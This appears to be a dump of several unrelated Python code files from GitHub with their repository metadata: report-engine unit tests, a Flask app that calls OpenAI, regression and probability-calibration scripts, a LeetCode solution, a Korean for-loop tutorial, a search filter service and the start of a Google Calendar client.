self._ckeck_order_line(\n grid, 6, 3, 'Mascarpone Fabioli', 6.0,\n 25.6, 153.6, 0.2, 30.72, 122.88, 3, 1614.88, 538.29, 3)\n self._ckeck_order_footer(\n grid, 7, 3, 3, 3, 2018.6, 4483.4, 4483.4,\n 1614.88, 1614.88, 1614.88, 10258)\n self._ckeck_order_header(grid, 8, 2, 10263)\n self._ckeck_order_line(\n grid, 10, 5, 'Longlife Tofu', 36.0,\n 8.0, 288.0, 0.25, 72.0, 216.0, 2, 316.8, 158.4, 5)\n self._ckeck_order_line(\n grid, 12, 7, 'Pavlova', 60.0,\n 13.9, 834.0, 0.25, 208.50, 625.5, 4, 1873.8, 468.45, 7)\n self._ckeck_order_footer(\n grid, 13, 4, 7, 7, 2464.8, 4483.4, 4483.4,\n 1873.8, 3488.68, 3488.68, 10263)\n\n # Brazil\n self._ckeck_country_header(\n grid, 21, 20, 3, 'Brazil', 229.0,\n 4223.6, 260.4, 3963.2, 10, 3963.2, 396.32)\n self._ckeck_customer_header(\n grid, 22, 1, 'Hanari Carnes', 162.00,\n 3257.8, 260.4, 2997.4, 6, 2997.4, 499.57)\n self._ckeck_order_header(grid, 23, 1, 10250)\n self._ckeck_order_line(\n grid, 24, 11, \"Jack's New England Clam Chowder\", 10.0,\n 7.7, 77.0, 0.0, 0.0, 77.0, 1, 77.0, 77.0, 11)\n self._ckeck_order_line(\n grid, 26, 13, \"Manjimup Dried Apples\", 35.0,\n 42.4, 1484.0, 0.15, 222.6, 1261.4, 3, 1552.6, 517.53, 13)\n self._ckeck_order_footer(\n grid, 27, 3, 3, 3, 1813.0, 3257.8, 4223.6,\n 1552.6, 1552.6, 1552.6, 10250)\n self._ckeck_order_footer(\n grid, 32, 3, 6, 6, 1444.8, 3257.8, 4223.6,\n 1444.8, 2997.4, 2997.4, 10253)\n self._ckeck_customer_header(\n grid, 33, 2, 'Que Delícia', 40.0,\n 448.0, 0.0, 448.0, 2, 448.0, 224.0)\n self._ckeck_order_footer(\n grid, 37, 2, 2, 8, 448.0, 448.0, 4223.6,\n 448.0, 448.0, 3445.4, 10261)\n self._ckeck_customer_header(\n grid, 38, 3, \"Wellington Importadora\", 27.0,\n 517.8, 0.0, 517.8, 2, 517.8, 258.9)\n self._ckeck_order_line(\n grid, 41, 20, \"Perth Pasties\", 15.0,\n 26.2, 393.0, 0.0, 0.0, 393.0, 2, 517.8, 258.9, 20)\n self._ckeck_order_footer(\n grid, 42, 2, 2, 10, 517.8, 517.8, 4223.6,\n 517.8, 517.8, 3963.2, 10256)\n\n # Venezuela\n self._ckeck_country_header(\n grid, 200, 100, 13, 'Venezuela', 136.0,\n 3635.9, 0.0, 3635.9, 9, 3635.9, 403.99)\n self._ckeck_customer_header(\n grid, 201, 1, \"GROSELLA-Restaurante\", 14.0,\n 1101.2, 0.0, 1101.2, 2, 1101.2, 550.6)\n self._ckeck_order_line(\n grid, 203, 92, \"Mozzarella di Giovanni\", 4.0,\n 27.8, 111.2, 0.0, 0.0, 111.2, 1, 111.2, 111.2, 92)\n self._ckeck_order_footer(\n grid, 205, 2, 2, 2, 1101.2, 1101.2, 3635.9,\n 1101.2, 1101.2, 1101.2, 10268)\n self._ckeck_order_footer(\n grid, 218, 4, 4, 9, 1414.8, 1414.8, 3635.9,\n 1414.8, 1414.8, 3635.9, 10283)\n\n def _ckeck_order_footer(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(round(self._cell_value(grid, row, 4), 2), v4)\n # Sum('F.subtotal1', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # Sum('F.subtotal1', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 6), 2), v6)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 9), 2), v9)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 10), v10)\n\n def _ckeck_order_line(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12):\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # F.product\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # F.quantity\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # F.unitprice\n self.assertEqual(self._cell_value(grid, row, 4), v4)\n # F.subtotal1\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # F.discount\n self.assertEqual(self._cell_value(grid, row, 6), v6)\n # F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # F.subtotal1 - F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 9), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v10)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v11)\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 12), v12)\n\n def _ckeck_order_header(self, grid, row, v1, v2):\n # RunningValue('F.orderid','CountDistinct','customer')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n\n def _ckeck_customer_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9):\n # RunningValue('F.customer', 'CountDistinct', 'country')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.customer\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v4)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v5)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v6)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 9), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v9)\n\n def _ckeck_country_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber() in Tablix contexts (Counting countries)\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # RunningValue('F.country', 'CountDistinct')\n self.assertEqual(self._cell_value(grid, row, 1), v2)\n # F.country\n self.assertEqual(self._cell_value(grid, row, 2), v3)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v4)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v5)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v6)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v7)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 9), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v10)\n\n def _cell_value(self, grid, row, column):\n cell = grid.get_cell(row, column)\n return cell.object.item_list[0].value\n\n def test_functions(self):\n # Conversion functions\n self.assertEqual(fn.CBool('true'), True)\n self.assertEqual(fn.CBool('t'), True)\n\n self.assertEqual(\n fn.CDate('20151231'), datetime(2015, 12, 31, 0, 0, 0))\n self.assertEqual(\n fn.CDate('20151231 23:59:59'), datetime(2015, 12, 31, 23, 59, 59))\n\n self.assertEqual(fn.CInt('1'), 1)\n self.assertEqual(fn.CInt(1.1), 1)\n\n self.assertEqual(fn.CFloat('1.1'), 1.1)\n self.assertEqual(fn.CInt(fn.CFloat('1.1')), 1)\n\n self.assertEqual(fn.CDecimal('1.1'), Decimal('1.1'))\n self.assertEqual(fn.CDecimal(1.1), Decimal(1.1))\n\n self.assertEqual(fn.CStr(1.1), '1.1')\n self.assertEqual(fn.CStr(True), 'True')\n self.assertEqual(\n fn.CStr(datetime(2015, 12, 31, 0, 0, 0)), '2015-12-31 00:00:00')\n\n # Conditional functions\n self.assertEqual(fn.Iif(True, 'a', 'b'), 'a')\n self.assertEqual(fn.Iif(False, 'a', 'b'), 'b')\n self.assertEqual(fn.Iif(None, 'a', 'b'), 'b')\n\n self.assertEqual(fn.Switch(0, 0, 'a', 1, 'b', 2, 'c'), 'a')\n self.assertEqual(fn.Switch(1, 0, 'a', 1, 'b', 2, 'c'), 'b')\n self.assertEqual(fn.Switch(2, 0, 'a', 1, 'b', 2, 'c'), 'c')\n\n self.assertEqual(fn.Choose(1, 'a', 'b', 'c'), 'a')\n self.assertEqual(fn.Choose(2, 'a', 'b', 'c'), 'b')\n self.assertEqual(fn.Choose(3, 'a', 'b', 'c'), 'c')\n\n # Date funtions\n self.assertEqual(fn.Day(datetime(2015, 12, 31, 23, 15, 49)), 31)\n self.assertEqual(fn.Month(datetime(2015, 12, 31, 23, 15, 49)), 12)\n self.assertEqual(fn.Year(datetime(2015, 12, 31, 23, 15, 49)), 2015)\n self.assertEqual(fn.Hour(datetime(2015, 12, 31, 23, 15, 49)), 23)\n self.assertEqual(fn.Minute(datetime(2015, 12, 31, 23, 15, 49)), 15)\n self.assertEqual(fn.Second(datetime(2015, 12, 31, 23, 15, 49)), 49)\n self.assertEqual(fn.Day(fn.Today()), fn.Day(datetime.today()))\n\n # String funtions\n self.assertEqual(fn.Format('Hello', 'Hello'), 'Hello')\n self.assertEqual(fn.Format('World!', 'Hello {0}'), 'Hello World!')\n self.assertEqual(fn.Format(12, '{:,.2f}'), '12.00')\n\n self.assertEqual(fn.LCase('To Lower'), 'to lower')\n self.assertEqual(fn.LCase(None), None)\n self.assertEqual(fn.UCase('To Upper'), 'TO UPPER')\n self.assertEqual(fn.UCase(None), None)\n self.assertEqual(fn.Len(''), 0)\n self.assertEqual(fn.Len('Get Lenght'), 10)\n self.assertEqual(fn.Len(None), None)\n self.assertEqual(fn.LTrim(''), '')\n self.assertEqual(fn.LTrim(' '), '')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim(' LTrim'), 'LTrim')\n self.assertEqual(fn.LTrim('LTrim '), 'LTrim ')\n self.assertEqual(fn.RTrim(''), '')\n self.assertEqual(fn.RTrim(' '), '')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim('RTrim '), 'RTrim')\n self.assertEqual(fn.RTrim(' RTrim'), ' RTrim')\n self.assertEqual(fn.Trim(''), '')\n self.assertEqual(fn.Trim(' '), '')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n self.assertEqual(fn.Trim(' Trim '), 'Trim')\n\n mid_test = 'Mid Function Demo'\n self.assertEqual(fn.Mid(mid_test, 1, 3), 'Mid')\n self.assertEqual(fn.Mid(mid_test, 14, 4), 'Demo')\n self.assertEqual(fn.Mid(mid_test, 5), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 5, 150), 'Function Demo')\n self.assertEqual(fn.Mid(mid_test, 150), '')\n\n replace_test = 'abc def abc hij klm'\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx'), 'xxx def xxx hij klm')\n self.assertEqual(\n fn.Replace(replace_test, 'abc', 'xxx', 1), 'xxx def abc hij klm')\n\n self.assertEqual(fn.String(5, 'x'), 'xxxxx')\n self.assertEqual(fn.String(0, 'x'), '')\n\n # Test functions in report\n\n report = Report(self._get_functios_xml())\n report.run()\n\n def _get_functios_xml(self):\n return r'''\n<Nuntiare>\n <Name>Functions tests</Name>\n <Page></Page>\n <Body>\n <ReportItems>\n <Tablix>\n <Name>grid_functions</Name>\n <TablixColumnHierarchy>\n <TablixMembers>\n <TablixMember/>\n </TablixMembers>\n </TablixColumnHierarchy>\n <TablixRowHierarchy>\n <TablixMembers>\n <TablixMember/>\n </TablixMembers>\n </TablixRowHierarchy>\n <TablixBody>\n <TablixColumns>\n <TablixColumn>\n <Width>5mm</Width>\n </TablixColumn>\n <TablixColumn>\n <Width>5mm</Width>\n </TablixColumn>\n </TablixColumns>\n <TablixRows>\n <TablixRow>\n <Height>5mm</Height>\n <TablixCells>\n <TablixCell>\n <CellContents>\n <ReportItems>\n <Textbox>\n <Name>cbool</Name>\n <Value>=CBool('true')</Value>\n </Textbox>\n </ReportItems>\n </CellContents>\n </TablixCell>\n <TablixCell>\n <CellContents>\n <ReportItems>\n <Textbox>\n <Name>cfloat</Name>\n <Value>=CFloat('1.99')</Value>\n </Textbox>\n </ReportItems>\n </CellContents>\n </TablixCell>\n </TablixCells>\n </TablixRow>\n </TablixRows>\n </TablixBody>\n </Tablix>\n </ReportItems>\n </Body>\n</Nuntiare>\n'''\n","repo_name":"formateli/nuntiare","sub_path":"tests/unittest/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":15683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72991219527","text":"'''\nCreate a flask app that has a textbox and a button. When the button is clicked, the text in the textbox is sent to the OpenAI API and the response is displayed on the page.\n'''\nfrom flask import Flask, render_template, request\nfrom gpt import GPT, Example\nimport openai\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n prompt = request.form['prompt']\n openai.api_key = \"\"\n gpt = GPT(engine=\"davinci\", temperature=0.5, max_tokens=100)\n output = gpt.submit_request(prompt)\n return render_template('index.html', output=output.choices[0].text)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Tominium/GPT3-Sandbox","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21359318333","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 1 13:36:23 2022\r\n\r\n@author: ramav\r\n\"\"\"\r\n#SIMPLE LINEAR REGREESSION\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\ndf.isnull().sum()\r\n\r\n\r\nx = df.iloc[:,:1].values\r\ny = df.iloc[:,-1].values\r\n\r\n#EDA\r\nplt.scatter(x, y, color=\"red\")\r\nplt.title(\" relation between salary and experience\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nplt.boxplot(x)\r\nplt.show()\r\nplt.hist(x)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.25,random_state=0)\r\nx_train.shape\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train, y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\nLR.intercept_.round(3) #Bo\r\nLR.coef_.round(3) #B1\r\n\r\n\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_test = LR.predict(x_test)\r\n\r\ny_pred_train\r\ny_pred_test\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y_train,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_train,y_pred_train).round(2)*100) #96\r\n\r\n\r\nmse1 = mean_squared_error(y_test,y_pred_test)\r\nRMSE1= np.sqrt(mse1)\r\nprint(\"Root mean square :\", RMSE1.round(2)) #RMSE=5415.91\r\n\r\nprint(\"R square:\",r2_score(y_test,y_pred_test).round(2)*100)\r\n\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_train,y_pred_train,color=\"red\")\r\nplt.title(\"training scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x_train,y_train,color=\"blue\")\r\nplt.plot(x_test,y_pred_test,color=\"red\")\r\nplt.title(\"test scatter plot\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"D:\\\\Assignments\\\\simple linear regresssion\\\\salary_data.csv\")\r\n\r\ndf.head()\r\ndf.shape\r\n\r\n# x and y variable\r\nx = df[\"YearsExperience\"]\r\ny = df[\"Salary\"]\r\n\r\n\r\n#split as train and test\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.30,random_state=42)\r\n\r\nx_train.shape\r\n\r\n#scatter plot between x and y\r\ndf.plot(kind=\"scatter\",x=\"YearsExperience\",y=\"Salary\")\r\nplt.show()\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.scatter(x,y,color=\"red\",edgecolors=\"orange\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#box plot to know outliers\r\ndf.plot(kind=\"box\")\r\nplt.show()\r\n\r\ndf.corr()\r\n\r\n# Dataframe\r\nx_train = pd.DataFrame(x_train)\r\ny_train= pd.DataFrame(y_test)\r\n\r\nx_ test= pd.DataFrame(x_test)\r\ny_test= pd.DataFrame(y_test)\r\n\r\n\r\n\r\n# model fitting\r\nfrom sklearn.linear_model import LinearRegression\r\nLR = LinearRegression()\r\nLR.fit(x_train,y_train)\r\n\r\n#knowing Bo(inrecept) and B1 value(coefficient)\r\n\r\nLR.intercept_.round(3)\r\nLR.coef_.round(3)\r\n\r\nLR.score(x,y).round(3)\r\n\r\n#prediction\r\ny_pred_train = LR.predict(x_train)\r\ny_pred_train\r\n\r\ny_pred_test = LR.predict(x_test)\r\ny_pred_test\r\n\r\n#comparsion between y actual and y_pred by using scatter plot\r\nplt.scatter(x=x.iloc[:,0],y=y,color=\"red\")\r\nplt.plot(x.iloc[:,0], y_pred_train,color=\"blue\")\r\nplt.xlabel(\"YearsExperience\")\r\nplt.ylabel(\"salary\")\r\nplt.show()\r\n\r\n# calculating mean square eror and Root of mean square error\r\nfrom sklearn.metrics import mean_squared_error,r2_score\r\nmse = mean_squared_error(y,y_pred_train)\r\n\r\nRMSE = np.sqrt(mse)\r\nprint(\"Root mean square :\", RMSE.round(2))\r\n\r\nprint(\"R square:\",r2_score(y,y_pred).round(2)*100)\r\n\r\n'''\r\n","repo_name":"ajithsinghr/Build-a-prediction-model-for-salary-hike-Simple-linear-regression","sub_path":"solved Sal_data.py","file_name":"solved Sal_data.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5109464108","text":"class Solution(object):\n def anagramMappings(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: List[int]\n :rtype: List[int]\n \"\"\"\n dic = {}\n \n for i,n in enumerate(B):\n dic.setdefault(n, []).append(i)\n \n \n return [dic.get(n).pop(0) for n in A]\n","repo_name":"simonzg/leetcode-solutions","sub_path":"760.Find_Anagram_Mappings.py","file_name":"760.Find_Anagram_Mappings.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20984391504","text":"# Python3\n# Create date: 2023-06-15\n# Author: Scc_hy\n# Func: 保序回归\n# ==============================================================================================\n\n# calibration_curve PLOT\n# -------------------------------\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.calibration import calibration_curve\nnp.random.seed(2023)\n\n\ny_true = np.random.randint(0, 2, size=1000)\ny_pred = np.random.binomial(n=200, p=0.19, size=1000)\ny_pred = (y_pred - y_pred.min())/(y_pred.max()-y_pred.min())\ny_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n)\n\n# 分割图片 2:1\nfig = plt.figure(constrained_layout=True, figsize=(16, 4))\ngs = fig.add_gridspec(1, 3)\naxes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n# 绘制分布\nsns.histplot(y_pred, alpha=0.7, ax=axes1)\nfor i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\naxes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\naxes1.set_xlabel('Predicted probability')\n# 绘制对准曲线\naxes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\naxes2.plot(proba_means, y_means, linestyle='-.')\naxes2.set_title('Simplr Predict Calibrator')\naxes2.legend()\naxes2.set_xlabel(\"Bin's mean of predicted probability\")\naxes2.set_ylabel(\"Bin's mean of target variable\")\nplt.show()\n\n\ndef quick_calibration_plot(y_true, y_pred, title_msg=''):\n y_means, proba_means = calibration_curve(\n y_true, \n y_pred, \n n_bins=10, \n strategy='quantile'\n )\n # 分割图片 2:1\n fig = plt.figure(constrained_layout=True, figsize=(16, 4))\n gs = fig.add_gridspec(1, 3)\n axes1, axes2 = fig.add_subplot(gs[:2]), fig.add_subplot(gs[2]) \n # 绘制分布\n sns.histplot(y_pred, alpha=0.7, ax=axes1)\n for i in proba_means:\n axes1.axvline(x=i, linestyle='--', color='darkred', alpha=0.7)\n axes1.set_title(\"predict and bin split\\nstrategy='quantile'\")\n axes1.set_xlabel('Predicted probability')\n # 绘制对准曲线\n axes2.plot([0, 1], [0, 1], linestyle = '--', label = 'Perfect calibration')\n axes2.plot(proba_means, y_means, linestyle='-.')\n axes2.set_title(f'Simple Predict Calibrator\\n{title_msg}')\n axes2.legend()\n axes2.set_xlabel(\"Bin's mean of predicted probability\")\n axes2.set_ylabel(\"Bin's mean of target variable\")\n plt.show()\n \n\n# 校准试验\n# -------------------------------\ndef expected_calibration_error(y, proba, bins = 'fd'):\n bin_count, bin_edges = np.histogram(proba, bins = bins)\n n_bins = len(bin_count)\n bin_edges[0] -= 1e-8 # because left edge is not included\n bin_id = np.digitize(proba, bin_edges, right = True) - 1\n bin_ysum = np.bincount(bin_id, weights = y, minlength = n_bins)\n bin_probasum = np.bincount(bin_id, weights = proba, minlength = n_bins)\n bin_ymean = np.divide(bin_ysum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n bin_probamean = np.divide(bin_probasum, bin_count, out = np.zeros(n_bins), where = bin_count > 0)\n ece = np.abs((bin_probamean - bin_ymean) * bin_count).sum() / len(proba)\n return ece\n\n\n# 模型简单拟合\nfrom sklearn.datasets import make_classification\nfrom sklearn.isotonic import IsotonicRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nX, y = make_classification(\n n_samples = 15000, \n n_features = 50, \n n_informative = 30, \n n_redundant = 20,\n weights = [.9, .1],\n random_state = 0\n)\nX_train, X_valid, X_test = X[:5000], X[5000:10000], X[10000:]\ny_train, y_valid, y_test = y[:5000], y[5000:10000], y[10000:]\nforest = RandomForestClassifier().fit(X_train, y_train)\nproba_valid = forest.predict_proba(X_valid)[:, 1]\n\n# 保序回归\niso_reg = IsotonicRegression(y_min = 0, y_max = 1, out_of_bounds = 'clip').fit(proba_valid, y_valid)\ntest_pred = forest.predict_proba(X_test)[:, 1]\nece_org = expected_calibration_error(y_test, test_pred, bins = 'fd')\nquick_calibration_plot(y_test, test_pred, title_msg=f'not  calibration ECE={ece_org:.3f}')\n\nproba_test_forest_isoreg = iso_reg.predict(test_pred)\nece_iosreg = expected_calibration_error(y_test, proba_test_forest_isoreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_isoreg, title_msg=f'IsotonicRegression ECE={ece_iosreg:.3f}')\n\n# logistic\nlog_reg = LogisticRegression().fit(proba_valid.reshape(-1, 1), y_valid)\nproba_test_forest_logreg = log_reg.predict_proba(test_pred.reshape(-1, 1))[:, 1]\n\nece_logreg = expected_calibration_error(y_test, proba_test_forest_logreg, bins = 'fd')\nquick_calibration_plot(y_test, proba_test_forest_logreg, title_msg=f'IsotonicRegression ECE={ece_logreg:.3f}')","repo_name":"scchy/CSDN","sub_path":"保序回归New.py","file_name":"保序回归New.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24851150742","text":"# for 문\n# 1. 형식\n# for 변수 in 반복객체:\n# 반복실행문\n# 2. 반복객체\n# 리스트, 튜플, 세트, 사전, 문자열, 정수집합(range)\n# 3. 정수집합(range)\n# 1) range(10) : 0 ~ 9\n# 2) range(1, 10) : 1 ~ 9\n# 3) range(1, 10, 2) : 1, 3, 5, 7, 9\n\nfor a in [1, 2, 3]:\n print(a)\n\nfor b in (1, 2, 3):\n print(b)\n\nfor c in 'Hello':\n print(c)\n\nfor d in range(10):\n print(d)\n\nmy_list = [1, 2, 3, 4, 5]\nfor idx in range(len(my_list)):\n print(my_list[idx])\n\n# 이름 따로, 나이 따로 출력\nmy_list = [('에밀리', 20), ('제임스', 25)]\nfor person in my_list:\n for p in person:\n print(p)\n","repo_name":"hwangseokjin94/gitstudy","sub_path":"pythonstudy/workspace/day02/EX12_for.py","file_name":"EX12_for.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39014700329","text":"from src.schemas.response import HTTPResponses, HttpResponseModel\nfrom src.schemas.album import AlbumCreateModel\nfrom src.db.__init__ import database as db\nfrom src.service.impl.song_service import SongService\nfrom src.service.impl.album_service import AlbumService\n\n\nclass FiltersService:\n\n @staticmethod\n def get_filters(name: str = None, year: int = None, genre: str = None):\n albums_titles = set()\n songs_titles = set()\n\n if name:\n res1 = AlbumService.get_album_by_name(name)\n res2 = SongService.get_songs_by_name(name)\n res3 = SongService.get_by_artist(name)\n res4 = AlbumService.get_by_artist(name)\n\n if res1 is None:\n res1 = []\n if res2 is None:\n res2 = []\n if res3 is None:\n res3 = []\n if type(res1) is dict:\n res1 = [res1]\n if type(res2) is dict:\n res2 = [res2]\n if type(res3) is dict:\n res3 = [res3]\n\n albums_titles |= {album['id'] for album in res1}\n\n albums_titles |= {album['id'] for album in res4}\n\n songs_titles |= {song['id']\n for song in res2}\n songs_titles |= {song['id']\n for song in res3}\n if year:\n\n res1 = AlbumService.get_by_year(year)[\n 'songs']\n res2 = SongService.get_by_year(year)[\n 'songs']\n\n albums_by_year_titles = {album['id'] for album in res1}\n songs_by_year_titles = {song['id'] for song in res2}\n\n # print(albums_by_year_titles)\n # print(songs_by_year_titles)\n\n # Se o nome for fornecido, fazemos a interseção com os álbuns filtrados por nome\n if name:\n albums_titles &= albums_by_year_titles\n songs_titles &= songs_by_year_titles\n\n else:\n albums_titles = albums_by_year_titles\n songs_titles = songs_by_year_titles\n\n if genre:\n print(\"procurando por genero\")\n\n res1 = AlbumService.get_by_genre(genre)['songs']\n res2 = SongService.get_by_genre(genre)['songs']\n\n albums_by_genre_titles = {\n album['id'] for album in res1}\n songs_by_genre_titles = {song['id']\n for song in res2}\n\n # Se o nome ou ano forem fornecidos, fazemos a interseção com os álbuns já filtrados\n if name or year:\n albums_titles &= albums_by_genre_titles\n songs_titles &= songs_by_genre_titles\n\n else:\n albums_titles = albums_by_genre_titles\n songs_titles = songs_by_genre_titles\n\n # Obtendo os álbuns e músicas completos com os títulos filtrados\n all_albums = AlbumService.get_albums()\n all_songs = SongService.get_songs()\n\n albums = [album for album in all_albums if album['id'] in albums_titles]\n songs = [song for song in all_songs if song['id'] in songs_titles]\n\n # delete the id key from the response\n # for album in albums:\n # del album['id']\n # for song in songs:\n # del song['id']\n\n response = {\n 'albums': albums,\n 'songs': songs,\n }\n\n return response\n","repo_name":"lumendesp/groove-app","sub_path":"backend/src/service/impl/search_service.py","file_name":"search_service.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40373142172","text":"#!/usr/bin/env python3\n\nimport os\nimport pickle\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\n\nSCOPES = [\n \"https://www.googleapis.com/auth/calendar\",\n \"https://www.googleapis.com/auth/calendar.readonly\",\n]\nCREDENTIALS_FILE = \".gcal.credentials.json\"\nTOKEN_FILE = \".gcal.token.json\"\n\n\nclass GCal:\n def 